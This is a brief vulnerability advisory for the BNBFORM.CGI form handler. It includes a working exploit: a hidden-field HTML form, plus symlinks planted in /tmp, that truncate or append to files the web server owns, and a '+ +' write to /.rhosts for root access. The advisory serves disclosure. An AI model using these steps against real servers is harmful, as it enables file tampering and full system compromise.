suid@suid.kg - mini advisory - BNBFORM.CGI

Software: 	BNBFORM.CGI 
Vendor:		BigNoseBird.com
URL:		http://bignosebird.com/carchive/bnbform.shtml
Version:	Version 4.0
Platforms:	Unix, Windows NT
Type:		Input validation problem

Summary:

	Any local user can create / append to / truncate any file owned
	by the web server user (nobody/apache/whatever).

Vulnerability:

	Building a HTML form resembling:

		<form method=post action=/cgi-bin/bnbform.cgi>

		<input type=hidden name=blah value=blah>
		<input type=hidden name=required value=blah>
		<input type=hidden name=data_order value=blah>

		<!-- To truncate a file -->
		<input type=hidden name=countfile value="/tmp/whatever">
	
		<!-- To append to a file  -->
		<input type=hidden name=outputfile value="/tmp/whatever">

		<input type=submit>
		</form>

	In the /tmp directory as a local user, create a symbolic link to
	either /tmp/whatever.bcnt for the countfile/truncate version, or
	/tmp/whatever.bout for the outputfile/append version.

	If httpd is running with UID == 0, you could potentially get root
	if the system honours /.rhosts by setting the value of blah to
	"+ +\n". Then symlink'ing /tmp/whatever.bout -> /.rhosts Example:

		<input type=hidden name=blah value="+ +
">

	Of course you could simply send this in a POST request directly
	to the web server. Whatever.

	Ok. Have a good one.	

http://www.suid.edu/advisories/004.txt

EOF